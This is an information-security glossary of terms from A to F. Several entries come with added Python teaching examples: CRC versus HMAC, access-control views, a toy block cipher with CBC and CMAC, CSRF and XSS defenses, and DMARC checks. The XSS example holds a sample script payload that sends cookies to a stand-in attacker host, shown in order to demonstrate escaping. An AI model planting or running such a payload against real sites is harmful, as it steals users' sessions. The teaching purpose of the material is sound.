In InfoSec there are numerous terms for which it is important to know not only the meaning but the acronym as well. I have already witnessed this in my early career: when troubleshooting an issue with coworkers across different teams, trialing a product and speaking with a support rep, reading the documentation of a product or service, or listening to security podcasts, you should be comfortable with MOST of the common terms you're likely to come across. I created this glossary so that everyone can become comfortable with the definitions of these terms, and to conveniently assemble those definitions in a single location. This glossary was created using both NIST's CSRC and SANS glossaries as a guide. More terms will be added over time!
Access Control - Access Control ensures that resources are only granted to those users who are entitled to them.
Access Control List (ACL) - A mechanism that implements access control for a system resource by listing the identities of the system entities that are permitted to access the resource.
Access Control Service - A security service that provides protection of system resources against unauthorized access. The two basic mechanisms for implementing this service are ACLs and tickets.
Access Management - The set of practices that enables only those permitted the ability to perform an action on a particular resource. The three most common Access Management services you encounter every day, perhaps without realizing it, are Policy Administration, Authentication, and Authorization. Access Management also covers the maintenance of access information, which consists of four tasks: account administration, maintenance, monitoring, and revocation.
Access Control Matrix - A table in which each row represents a subject, each column represents an object, and each entry is the set of access rights for that subject to that object.
Account Harvesting - Account Harvesting is the process of collecting all the legitimate account names on a system.
ACK Piggybacking - ACK piggybacking is the practice of sending an ACK inside another packet going to the same destination.
Automated Certificate Management Environment (ACME) - A protocol defined in IETF RFC 8555 that provides for the automated enrollment of certificates.
Advanced Persistent Threat (APT) - An adversary with sophisticated levels of expertise and significant resources, allowing it through the use of multiple different attack vectors (e.g., cyber, physical, and deception) to generate opportunities to achieve its objectives, which are typically to establish and extend footholds within the information technology infrastructure of organizations for purposes of continually exfiltrating information and/or to undermine or impede critical aspects of a mission, program, or organization, or place itself in a position to do so in the future; moreover, the advanced persistent threat pursues its objectives repeatedly over an extended period of time, adapting to a defender’s efforts to resist it, and with determination to maintain the level of interaction needed to execute its objectives.
Active Content - Program code embedded in the contents of a web page. When the page is accessed by a web browser, the embedded code is automatically downloaded and executed on the user's workstation. Examples: Java applets, ActiveX (Microsoft), JavaScript.
Activity Monitors - Activity monitors aim to prevent virus infection by monitoring for malicious activity on a system, and blocking that activity when possible.
Address Resolution Protocol (ARP) - A protocol for mapping an Internet Protocol address to the physical (MAC) address recognized on the local network. A table, usually called the ARP cache, maintains the correlation between each MAC address and its corresponding IP address. ARP provides the protocol rules for making this correlation (IP address to MAC address; the reverse mapping was historically done by RARP). ARP replies are unauthenticated, so any host on the same segment can forge them (ARP spoofing or poisoning) to intercept or redirect traffic.
Advanced Encryption Standard (AES) - A U.S. Government-approved cryptographic algorithm that can be used to protect electronic data. The AES algorithm is a symmetric block cipher that can encrypt (encipher) and decrypt (decipher) information.
Algorithm - A finite set of step-by-step instructions for a problem-solving or computation procedure, especially one that can be implemented by a computer.
Asymmetric Cryptography - Public-key cryptography; A modern branch of cryptography in which the algorithms employ a pair of keys (a public key and a private key) and use a different component of the pair for different steps of the algorithm.
Auditing - Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures.
Authentication - Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in an information system.
Authenticity - Authenticity is the validity and conformance of the original information.
Authorization - The process of granting user or process the permission to do or have access to something.
Autonomous System (AS) - One or more routers under a single administration operating the same routing policy.
Availability - Ensuring timely and reliable access to and use of information.
AAA - Authentication, Authorization and Accounting (the last A is sometimes expanded as Auditing).
Attack Surface Management (ASM) - Attack surface management is the continuous discovery, monitoring, evaluation, prioritization and remediation of attack vectors within an organization’s IT infrastructure. While similar in nature to asset discovery or asset management, often found in IT hygiene solutions, the critical difference in attack surface management is that it approaches threat detection and vulnerability management from the perspective of the attacker. In so doing, the organization is driven to identify and evaluate risk posed not just by known assets, but unknown and rogue components as well.
Attribute Authority (AA) - An entity, recognized by the Federal PKI Policy Authority or comparable Agency body as having the authority to verify the association of attributes to an identity.
Attribute Based Access Control (ABAC) - An access control approach in which access is mediated based on attributes associated with subjects (requesters) and the objects to be accessed. Each object and subject has a set of associated attributes, such as location, time of creation, access rights, etc. Access to an object is authorized or denied depending upon whether the required (e.g., policy-defined) correlation can be made between the attributes of that object and of the requesting subject.
Acceptable Risk - The level of Residual Risk that has been determined to be a reasonable level of potential loss/disruption for a specific IT system.
Access Authority - An entity responsible for monitoring and granting access privileges for other authorized entities.
Access Complexity - A CVSS v2 base metric that reflects the complexity of the attack required to exploit a vulnerability once an attacker has reached the target. CVSS v3 renamed it Attack Complexity.
Authentication Header (AH) - A deprecated IPsec security protocol that provides integrity protection (but not confidentiality) for packet headers and data.
Annual Loss Expectancy (ALE) - The yearly estimate of loss of an asset, calculated as: ALE = ARO × SLE.
Annualized Rate of Occurrence (ARO) - The probability that a loss will occur in a year's time.
Backdoor - A backdoor is a tool installed after a compromise to give an attacker easier access to the compromised system around any security mechanisms that are in place.
Banner - A banner is the information that is displayed to a remote user trying to connect to a service. This may include version information, system information, or a warning about authorized use.
Banner Grabbing - The process of capturing banner information, such as application type and version, that is transmitted by a remote port when a connection is initiated.
Bastion Host - A special purpose computer on a network where the computer is specifically designed and configured to withstand attacks.
Business Email Compromise (BEC) - Business email compromise (BEC) is a type of email cyber crime scam in which an attacker targets a business to defraud the company. Business email compromise is a large and growing problem that targets organizations of all sizes across every industry around the world.
BIND - BIND stands for Berkeley Internet Name Domain and is an implementation of DNS. DNS is used for domain name to IP address resolution.
Biometrics - Measurable physical characteristics or personal behavioral traits used to identify, or verify the claimed identity of, an individual. Facial images, fingerprints, and handwriting samples are all examples of biometrics.
Block Cipher - An invertible symmetric-key cryptographic algorithm that operates on fixed-length blocks of input using a secret key and an unvarying transformation algorithm. The resulting output block is the same length as the input block.
Blue Team - The group responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers (i.e., the Red Team). Typically the Blue Team and its supporters must defend against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g., as part of an operational exercise), and 3) according to rules established and monitored with the help of a neutral group refereeing the simulation or exercise (i.e., the White Team).
Boot Record Infector - A boot record infector is a piece of malware that inserts malicious code into the boot sector of a disk.
Border Gateway Protocol (BGP) - An inter-autonomous system routing protocol. BGP is used to exchange routing information for the Internet and is the protocol used between Internet service providers (ISP).
Botnet - The word "botnet" is formed from the words "robot" and "network." Cyber criminals use Trojans to breach the security of many users' computers, take control of each computer, and organize the infected machines into a network of "bots" that the criminal can remotely manage.
Bridge - A product that connects a local area network (LAN) to another local area network that uses the same protocol (for example, Ethernet or token ring).
British Standard 7799 - A standard code of practice that provides guidance on how to secure an information system. It includes the management framework, objectives, and control requirements for information security management systems. It has since been superseded by ISO/IEC 27001 and ISO/IEC 27002.
Broadcast - To simultaneously send the same message to multiple recipients. One host to all hosts on network.
Broadcast Address - An address used to deliver a datagram to all hosts on a given network (for IPv4, the network's address with all host bits set to one), typically carrying UDP or ICMP traffic.
Brute Force - A cryptanalysis technique or other kind of attack method involving an exhaustive procedure that tries all possibilities, one-by-one.
Buffer Overflow - A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Adversaries exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.
Business Continuity Plan (BCP) - The documentation of a predetermined set of instructions or procedures that describe how an organization’s mission/business processes will be sustained during and after a significant disruption.
Business Impact Analysis (BIA) - An analysis of an information system’s requirements, functions, and interdependencies used to characterize system contingency requirements and priorities in the event of a significant disruption.
Certificate Authority (CA) - A trusted entity that issues and revokes public key certificates.
Cache Poisoning - Malicious or misleading data from a remote name server is saved [cached] by another name server. Typically used with DNS cache poisoning attacks.
Cyclic Redundancy Check (CRC) - A type of checksum algorithm that is not a cryptographic hash but is used to implement a data integrity service where only accidental changes to data are expected. A CRC has no key and is linear, so an attacker can modify data and simply recompute (or compensate) the checksum; against deliberate tampering use a MAC instead.
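The following added example (not part of the original glossary) makes the CRC entry concrete: a tampered record is accepted when integrity rests on an unkeyed CRC-32, because the attacker just recomputes it, while the same forgery fails against an HMAC whose key the attacker lacks. The record contents and key are constructed sample data; the `crc_is_affine` check shows the linearity property that makes CRC outputs predictable under controlled modifications.

```python
import hashlib
import hmac
import zlib


def crc_tag(message: bytes) -> int:
    """Integrity tag as a receiver relying on a plain CRC-32 computes it (no key)."""
    return zlib.crc32(message) & 0xFFFFFFFF


def mac_tag(key: bytes, message: bytes) -> bytes:
    """Keyed tag: HMAC-SHA256, a MAC in the sense of the glossary entry."""
    return hmac.new(key, message, hashlib.sha256).digest()


def crc_accepts(message: bytes, tag: int) -> bool:
    return crc_tag(message) == tag


def mac_accepts(key: bytes, message: bytes, tag: bytes) -> bool:
    # compare_digest avoids leaking the position of the first mismatching byte via timing.
    return hmac.compare_digest(mac_tag(key, message), tag)


def crc_is_affine(a: bytes, b: bytes) -> bool:
    """For equal-length inputs CRC-32 satisfies crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros),
    so an attacker can predict the tag of any XOR-modified message without computing it."""
    assert len(a) == len(b)
    a_xor_b = bytes(x ^ y for x, y in zip(a, b))
    return crc_tag(a_xor_b) == crc_tag(a) ^ crc_tag(b) ^ crc_tag(bytes(len(a)))


def demo() -> dict:
    key = b"receiver-secret-key"          # constructed: shared only by sender and receiver
    original = b"to=alice;amt=000100"      # constructed sample record
    tampered = b"to=carol;amt=999900"      # attacker's same-length replacement

    crc_sent = crc_tag(original)            # what the sender transmits with the record
    mac_sent = mac_tag(key, original)

    # CRC: the attacker recomputes the unkeyed tag for the new record and is accepted.
    crc_forgery_accepted = crc_accepts(tampered, crc_tag(tampered))
    # MAC: without the key the attacker can only replay the old tag, which is rejected.
    mac_forgery_accepted = mac_accepts(key, tampered, mac_sent)
    # Accidental corruption (one flipped bit) is the case CRC is designed to catch.
    corrupted = bytes([original[0] ^ 0x01]) + original[1:]
    crc_catches_bit_flip = not crc_accepts(corrupted, crc_sent)

    return {
        "crc_forgery_accepted": crc_forgery_accepted,   # True
        "mac_forgery_accepted": mac_forgery_accepted,   # False
        "crc_catches_bit_flip": crc_catches_bit_flip,   # True
        "crc_affine": crc_is_affine(original, tampered),  # True
    }
```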
Challenge-Handshake Authentication Protocol (CHAP) - An authentication protocol that uses a challenge/response mechanism in which the response varies with every challenge, to prevent replay attacks.
Chain of Custody - A process that tracks the movement of evidence through its collection, safeguarding, and analysis lifecycle by documenting each person who handled the evidence, the date/time it was collected or transferred, and the purpose for the transfer.
Chain of Evidence - A process and record that shows who obtained the evidence; where and when the evidence was obtained; who secured the evidence; and who had control or possession of the evidence. The "sequencing" of the chain of evidence follows this order: collection and identification; analysis; storage; preservation; presentation in court; return to owner. In practice the term is largely interchangeable with chain of custody.
Chain of Trust (CoT) - A certain level of trust in supply chain interactions such that each participant in the consumer-provider relationship provides adequate protection for its component products, systems, and services.
Certificate Revocation List (CRL) - These are digitally signed “blacklists” of revoked certificates. Certification authorities (CAs) periodically issue certificate revocation lists (CRLs), and users can retrieve them on demand via repositories.
Certificate Status Authority (CSA) - A trusted entity that provides on-line verification to a relying party of a subject certificate's trustworthiness, and may also provide additional attribute information for the subject certificate.
Capability List - A list attached to a subject ID specifying what accesses are allowed to the subject.
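The three entries Access Control List, Access Control Matrix and Capability List describe the same information viewed three ways. The following added example (not from the original glossary) builds a small constructed access control matrix and derives the ACL view (one list per object) and the capability view (one list per subject) from it, with deny-by-default checks and a revocation that shows the classic trade-off: revoking an object is one operation in the ACL view but must touch every capability list. Subject and object names are made up.

```python
from collections import defaultdict

# Constructed access control matrix: rows are subjects, columns are objects,
# each cell is the set of rights that subject holds on that object.
MATRIX = {
    "alice": {"payroll.db": {"read", "write"}, "wiki": {"read"}},
    "bob": {"wiki": {"read", "write"}},
    "backup-svc": {"payroll.db": {"read"}, "wiki": {"read"}},
}


def to_acls(matrix: dict) -> dict:
    """Column view: one ACL per object, naming the subjects allowed and their rights."""
    acls = defaultdict(dict)
    for subject, row in matrix.items():
        for obj, rights in row.items():
            acls[obj][subject] = set(rights)
    return dict(acls)


def to_capabilities(matrix: dict) -> dict:
    """Row view: one capability list per subject, naming what it may do to each object."""
    return {subject: {obj: set(r) for obj, r in row.items()} for subject, row in matrix.items()}


def acl_check(acls: dict, subject: str, obj: str, right: str) -> bool:
    # Deny by default: an unknown object, unknown subject, or missing right is a denial.
    return right in acls.get(obj, {}).get(subject, set())


def cap_check(caps: dict, subject: str, obj: str, right: str) -> bool:
    return right in caps.get(subject, {}).get(obj, set())


def who_can(acls: dict, obj: str, right: str) -> list:
    """'Who can write payroll.db?' is a single lookup in the ACL view."""
    return sorted(s for s, rights in acls.get(obj, {}).items() if right in rights)


def what_can(caps: dict, subject: str) -> dict:
    """'What can backup-svc reach?' is a single lookup in the capability view."""
    return {obj: sorted(rights) for obj, rights in caps.get(subject, {}).items()}


def revoke_object(acls: dict, caps: dict, obj: str) -> int:
    """Remove all access to an object in both views; returns how many capability
    lists had to be edited (every subject that held the object), versus one ACL."""
    acls.pop(obj, None)
    touched = 0
    for row in caps.values():
        if row.pop(obj, None) is not None:
            touched += 1
    return touched
```

Note that the two views answer different questions cheaply: ACLs make "who has access to this object" and object-side revocation easy, while capability lists make "what does this subject hold" easy and are the natural fit for tickets and tokens that a subject carries with it.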
Cipher Block Chaining (CBC) Mode - A cryptographic technique in which the same plaintext block, if repeated, produces different ciphertext blocks. In this scheme, the input to the encryption algorithm is the XOR of the current plaintext block and the preceding ciphertext block (the first block is XORed with an initialization vector); the same key is used for each block. In effect, the processing of the sequence of plaintext blocks is chained together. The IV must be unpredictable, and CBC on its own provides no integrity protection, so pair it with a MAC or prefer an authenticated mode such as GCM.
Cipher-based Message Authentication Code (CMAC) - A cryptographic mode of operation for calculating message authentication codes using a block cipher coupled with a secret key. You can use CMAC to verify both the authenticity and integrity of a message.
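The CBC and CMAC entries above both describe how a block cipher is chained from block to block. The following added example (not part of the original glossary) implements both over a small Feistel block cipher that stands in for AES so the code runs without third-party libraries; the cipher itself is a teaching stand-in and must not be used in real systems. The CBC half shows the point of the entry, that two identical plaintext blocks give identical ciphertext under ECB but different ciphertext under CBC; the CMAC half follows the NIST SP 800-38B construction (CBC-MAC with a zero IV plus the K1/K2 subkeys). The key and plaintext are constructed sample values.

```python
import hashlib
import hmac

BLOCK = 16  # 128-bit blocks, the AES block size, so CMAC subkey generation matches SP 800-38B

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Feistel round function: keyed hash of one half, truncated to half a block.
    return hmac.new(key + bytes([i]), half, hashlib.sha256).digest()[: BLOCK // 2]

def encrypt_block(key: bytes, block: bytes) -> bytes:
    """Toy 8-round Feistel block cipher standing in for AES (teaching only)."""
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for i in range(8):
        left, right = right, _xor(left, _round(key, i, right))
    return right + left  # undo the final swap so decryption mirrors encryption

def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(8)):
        left, right = right, _xor(left, _round(key, i, right))
    return right + left

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK  # PKCS#7: always append 1..16 bytes
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # an unauthenticated error here is a padding oracle
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CBC: each plaintext block is XORed with the previous ciphertext block (the IV first)."""
    assert len(iv) == BLOCK
    data, prev, out = pad(plaintext), iv, []
    for i in range(0, len(data), BLOCK):
        prev = encrypt_block(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    prev, out = iv, []
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(_xor(decrypt_block(key, cur), prev))
        prev = cur
    return unpad(b"".join(out))

def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """No chaining: identical plaintext blocks give identical ciphertext blocks."""
    data = pad(plaintext)
    return b"".join(encrypt_block(key, data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))

def _dbl(b: bytes) -> bytes:
    # Multiply by x in GF(2^128) with the SP 800-38B reduction constant 0x87.
    n = int.from_bytes(b, "big") << 1
    if n >> 128:
        n ^= 0x87
    return (n & ((1 << 128) - 1)).to_bytes(BLOCK, "big")

def cmac(key: bytes, message: bytes) -> bytes:
    """CMAC (SP 800-38B): CBC-MAC with a zero IV, last block masked with K1 or K2."""
    k1 = _dbl(encrypt_block(key, bytes(BLOCK)))
    k2 = _dbl(k1)
    if message and len(message) % BLOCK == 0:      # complete final block: K1, no padding
        body, last = message[:-BLOCK], _xor(message[-BLOCK:], k1)
    else:                                           # partial/empty final block: 10* pad, K2
        padded = message + b"\x80" + bytes(BLOCK - 1 - len(message) % BLOCK)
        body, last = padded[:-BLOCK], _xor(padded[-BLOCK:], k2)
    prev = bytes(BLOCK)
    for i in range(0, len(body), BLOCK):
        prev = encrypt_block(key, _xor(body[i:i + BLOCK], prev))
    return encrypt_block(key, _xor(last, prev))

def repeated_blocks_differ(key: bytes, iv: bytes) -> dict:
    """Two identical plaintext blocks: equal under ECB, distinct under CBC."""
    pt = b"ATTACK AT DAWN!!" * 2  # constructed 32-byte plaintext, two equal blocks
    ecb, cbc = ecb_encrypt(key, pt), cbc_encrypt(key, iv, pt)
    return {"ecb_equal": ecb[:BLOCK] == ecb[BLOCK:2 * BLOCK],
            "cbc_equal": cbc[:BLOCK] == cbc[BLOCK:2 * BLOCK],
            "roundtrip": cbc_decrypt(key, iv, cbc) == pt}
```

The K1/K2 masking is what separates CMAC from plain CBC-MAC: without it, a plain CBC-MAC over variable-length messages is vulnerable to length-extension style forgeries, which is why the glossary entry specifies CMAC rather than CBC-MAC for authenticity and integrity.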
Common Name (CN) - An attribute type that is commonly found within a Subject Distinguished Name in an X.500 directory information tree. When identifying machines, it is composed of a fully qualified domain name or IP address. Modern TLS clients no longer match the server name against the CN; they require the name to appear in the certificate's Subject Alternative Name (SAN) extension.
Central Oversight Authority (COA) - The cryptographic key management system (CKMS) entity that provides overall CKMS data synchronization and system security oversight for an organization or set of organizations.
Cloud Access Security Broker (CASB) - An intermediary between users and cloud platforms that protects data in the cloud while addressing authorization and visibility concerns of corporations leveraging cloud services. CASBs address security gaps associated with third-party cloud services and platforms that are not under your control but that process and store your data.
Cloud Infrastructure Security Posture Assessment (CISPA) - The first generation of CSPMs. CISPAs focused mainly on reporting, while CSPMs include automation at levels varying from straightforward task execution to the sophisticated use of artificial intelligence.
Cloud Security Posture Management (CSPM) - Automates the identification and remediation of risks across cloud infrastructures, including Infrastructure as a Service (IaaS), Software as a Service (SaaS), and Platform as a Service (PaaS). CSPM is used for risk visualization and assessment, incident response, compliance monitoring, and DevOps integration, and can uniformly apply best practices for cloud security to hybrid, multi-cloud, and container environments.
Cloud Workload Protection Platforms (CWPPs) - CWPPs protect workloads of all types in any location, offering unified cloud workload protection across multiple providers. They are based on technologies such as vulnerability management, anti-malware, and application security that have been adapted to meet modern infrastructure needs.
Common Vulnerabilities and Exposures (CVE) - A nomenclature and dictionary of security-related software flaws.
Common Vulnerability Scoring System (CVSS) - A system for measuring the relative severity of software flaw vulnerabilities.
Credential Service Provider (CSP) - A trusted entity that issues or registers subscriber tokens and issues electronic credentials to subscribers. The CSP may encompass registration authorities (RAs) and verifiers that it operates. A CSP may be an independent third party, or may issue credentials for its own use.
Criticality - A measure of the degree to which an organization depends on the information or information system for the success of a mission or of a business function.
Criticality Analysis - An end-to-end functional decomposition performed by systems engineers to identify mission-critical functions and components. Includes identification of system missions, decomposition into the functions to perform those missions, and traceability to the hardware, software, and firmware components that implement those functions. Criticality is assessed in terms of the impact of a function or component failure on the ability of the system to complete its mission(s).
Criticality Level - Refers to the (consequences of) incorrect behavior of a system. The more serious the expected direct and indirect effects of incorrect behavior, the higher the criticality level.
Cross-site Request Forgery (CSRF) - A web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other. For example, if a bank website is vulnerable to a CSRF attack, it may be possible for a subscriber to unintentionally authorize a large money transfer, merely by viewing a malicious link in a webmail message while a connection to the bank is open in another browser window.
Cross-site Scripting (XSS) - A web security vulnerability that allows attackers to inject malicious script into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between the website and client. Websites are vulnerable if they display user-supplied data from requests or forms without encoding (escaping) or sanitizing the data so that it is not executable.
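The CSRF and XSS entries above describe the two most common ways a browser is turned against its user. The following added example (not part of the original glossary, and not tied to any web framework) shows the server side of both: a transfer handler that rejects cross-site form posts using a session-bound synchronizer token and the Origin header, and a greeting renderer shown once vulnerable and once with output encoding. `SERVER_KEY`, `SITE_ORIGIN`, the session ids and the form contents are constructed assumptions for the demo.

```python
import hashlib
import hmac
import html
import secrets
from typing import Optional

SERVER_KEY = secrets.token_bytes(32)   # assumed per-deployment secret, never sent to clients
SITE_ORIGIN = "https://bank.example"    # assumed origin of the protected application


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session (HMAC of the session id). The server
    renders it into a hidden form field; a page on another origin cannot read it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted: Optional[str]) -> bool:
    if submitted is None:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)


def handle_transfer(session_id: str, form: dict, origin: Optional[str]) -> str:
    """State-changing POST handler. The browser attaches the victim's session cookie to a
    cross-site form post too, so the cookie proves nothing by itself; the token and the
    Origin header are what distinguish the user's own request from a forged one."""
    if origin is not None and origin != SITE_ORIGIN:
        return "403 blocked: Origin header does not match this site"
    if not verify_csrf(session_id, form.get("csrf_token")):
        return "403 blocked: missing or invalid CSRF token"
    return f"200 transferred {form['amount']} to {form['to']}"


def render_greeting_vulnerable(name: str) -> str:
    # Reflected XSS: user-supplied data is placed straight into the HTML response.
    return f"<p>Hello {name}</p>"


def render_greeting_safe(name: str) -> str:
    # Output encoding turns < > & " ' into entities, so the browser renders text, not markup.
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def demo() -> dict:
    victim = "session-victim-1"
    legit_form = {"to": "alice", "amount": "10", "csrf_token": issue_csrf_token(victim)}
    # A form auto-submitted from evil.example: the browser sends the victim's cookie,
    # but the attacker cannot supply a valid token and the Origin header gives it away.
    forged_form = {"to": "mallory", "amount": "9999"}
    # Constructed XSS payload that would exfiltrate the cookie if rendered unescaped.
    payload = "<script>location='https://evil.example/?c='+document.cookie</script>"
    attacker_token = issue_csrf_token("session-attacker")  # valid for their own session only
    return {
        "legit": handle_transfer(victim, legit_form, SITE_ORIGIN),
        "forged": handle_transfer(victim, forged_form, "https://evil.example"),
        "wrong_session_token": handle_transfer(
            victim, {**forged_form, "csrf_token": attacker_token}, None),
        "xss_vulnerable": render_greeting_vulnerable(payload),
        "xss_safe": render_greeting_safe(payload),
    }
```

Two details matter in practice: the token check must use a constant-time comparison, and the Origin check is a second, independent layer (older clients may omit the header, which is why the code only rejects on a mismatch rather than on absence).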
Data Encryption Standard (DES) - A formerly widely used method of data encryption using a private (secret) key. Its 56-bit key gives 72,000,000,000,000,000 (72 quadrillion) or more possible encryption keys. For each given message, the key is chosen at random from among this number of keys. Like other private-key cryptographic methods, both the sender and the receiver must know and use the same private key. The key space is far too small for modern hardware: DES keys can be brute-forced in days on commodity equipment, NIST withdrew the standard in 2005, and AES should be used instead.
Data Loss Prevention (DLP) - A systems ability to identify, monitor, and protect data in use (e.g. endpoint actions), data in motion (e.g. network actions), and data at rest (e.g. data storage) through deep packet content inspection, contextual security analysis of transaction (attributes of originator, data object, medium, timing, recipient/destination, etc.), within a centralized management framework. Data loss prevention capabilities are designed to detect and prevent the unauthorized use and transmission of NSS information.
Defense-in-Depth (DiD) - Information security strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.
Demilitarized Zone (DMZ) - A perimeter network or screened subnet separating an internal network that is more trusted from an external network that is less trusted.
Denial of Service (DoS) - The prevention of authorized access to resources or the delaying of time-critical operations.
Deny by Default - To block all inbound and outbound traffic that has not been expressly permitted by firewall policy.
Digital Signature Algorithm (DSA) - An asymmetric cryptographic algorithm that produces a digital signature in the form of a pair of large numbers. The signature is computed using rules and parameters such that the identity of the signer and the integrity of the signed data can be verified.
Digital Signature Standard (DSS) - The US Government standard that specifies the Digital Signature Algorithm (DSA), which involves asymmetric cryptography.
Disaster Recovery Plan (DRP) - A written plan for processing critical applications in the event of a major hardware or software failure or destruction of facilities.
Discretionary Access Control (DAC) - An access control policy that is enforced over all subjects and objects in an information system where the policy specifies that a subject that has been granted access to information can do one or more of the following: (i) pass the information to other subjects or objects; (ii) grant its privileges to other subjects; (iii) change security attributes on subjects, objects, information systems, or system components; (iv) choose the security attributes to be associated with newly-created or revised objects; or (v) change the rules governing access control. Mandatory access controls restrict this capability.
Distributed Denial of Service (DDoS) - A denial of service technique that uses numerous hosts to perform the attack.
DomainKeys Identified Mail (DKIM) - An email security standard designed to make sure messages aren’t altered in transit between the sending and recipient servers. It uses public-key cryptography to sign email with a private key as it leaves a sending server. Recipient servers then use a public key published to a domain’s DNS to verify the source of the message, and that the body of the message hasn’t changed during transit. Once the signature is verified with the public key by the recipient server, the message passes DKIM and is considered authentic.
Domain-based Message Authentication Reporting and Conformance (DMARC) - An email authentication, policy, and reporting protocol. It builds on the widely deployed SPF and DKIM protocols, adding linkage to the author (“From:”) domain name, published policies for recipient handling of authentication failures, and reporting from receivers to senders, to improve and monitor protection of the domain from fraudulent email.
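The DMARC entry describes "linkage to the author From: domain" and "published policies for handling authentication failures". The following added example (not part of the original glossary) implements that evaluation logic: it parses a DMARC TXT record, checks whether the SPF-authenticated and DKIM-authenticated domains align with the From: domain in strict or relaxed mode, and returns the disposition the record asks for. The record, domains and authentication results are constructed inputs, and the organizational-domain function is a deliberate simplification (real receivers consult the Public Suffix List).

```python
from typing import Optional, Tuple

DEFAULTS = {"adkim": "r", "aspf": "r", "pct": "100"}


def parse_dmarc_record(txt: str) -> dict:
    """Parse a _dmarc.<domain> TXT record such as 'v=DMARC1; p=reject; rua=mailto:...'."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record (needs v=DMARC1 and p=)")
    for key, value in DEFAULTS.items():
        tags.setdefault(key, value)
    return tags


def org_domain(domain: str) -> str:
    """Simplified organizational domain: the last two labels. Assumption for this demo;
    production code must use the Public Suffix List (e.g. co.uk has three labels)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain: str, auth_domain: Optional[str], mode: str) -> bool:
    """Identifier alignment: strict ('s') needs an exact match, relaxed ('r') needs the
    same organizational domain. A missing auth_domain means that check did not pass."""
    if auth_domain is None:
        return False
    a, b = from_domain.lower(), auth_domain.lower()
    return a == b if mode == "s" else org_domain(a) == org_domain(b)


def evaluate(record: dict, from_domain: str,
             spf_pass_domain: Optional[str], dkim_pass_domain: Optional[str]) -> Tuple[str, str]:
    """Return (dmarc_result, requested_disposition).

    spf_pass_domain:  the MAIL FROM domain if SPF returned pass, else None.
    dkim_pass_domain: the d= of a DKIM signature that verified, else None.
    Assumes `record` is the organizational domain's record, so sp= applies to subdomains.
    (pct= sampling is reported but not applied here.)"""
    spf_aligned = aligned(from_domain, spf_pass_domain, record["aspf"])
    dkim_aligned = aligned(from_domain, dkim_pass_domain, record["adkim"])
    if spf_aligned or dkim_aligned:
        return "pass", "none"
    is_subdomain = from_domain.lower() != org_domain(from_domain)
    policy = record.get("sp", record["p"]) if is_subdomain else record["p"]
    return "fail", policy
```

The interesting cases are the ones a forwarding or third-party sender hits: SPF may pass for a bulk mailer's bounce domain while the From: domain is the customer's, so only relaxed alignment (or a DKIM signature with the customer's own d=) saves the message.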
Extensible Authentication Protocol (EAP) - A framework that supports multiple, optional authentication mechanisms, originally for PPP and now most commonly carried over IEEE 802.1X on wired and enterprise Wi-Fi networks, including clear-text passwords, challenge-response, certificate-based methods (e.g., EAP-TLS), and arbitrary dialog sequences.
Fail Safe - A mode of termination of system functions that prevents damage to specified system resources and system entities (i.e., specified data, property, and life) when a failure occurs or is detected in the system (but the failure still might cause a security compromise).
Fail Secure - A mode of termination of system functions that prevents loss of secure state when a failure occurs or is detected in the system (but the failure still might cause damage to some system resource or system entity).
Fail Soft - Selective termination of affected, non-essential system functions when a failure occurs or is detected in the system.
Failover - The capability to switch over automatically (typically without human intervention or warning) to a redundant or standby information system upon the failure or abnormal termination of the previously active system.
Fast Flux - Protection method used by botnets consisting of a continuous and fast change of the DNS records for a domain name through different IP addresses.
Federated Identity - An arrangement in which a user's identity and attributes are shared across multiple parties (e.g., via SAML or OpenID Connect), which requires establishing trust among those parties, possibly at different trust levels.
Fingerprinting - Sending strange packets to a system in order to gauge how it responds to determine the operating system.
Flooding - An attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Forward Proxy - Forward Proxies are designed to be the server through which all requests are made.
Fragment Overlap Attack - A TCP/IP fragmentation attack that is possible because IP allows packets to be broken into fragments for more efficient transport across various media. The TCP segment (including its header) is carried inside the IP packet. In this attack the second fragment carries an incorrect offset, so that when the packet is reassembled the fragment overlaps the first one and overwrites the port number, letting traffic slip past filters that inspected only the first fragment.
Fully-Qualified Domain Name (FQDN) - A Fully-Qualified Domain Name is a server name with a hostname followed by the full domain name.
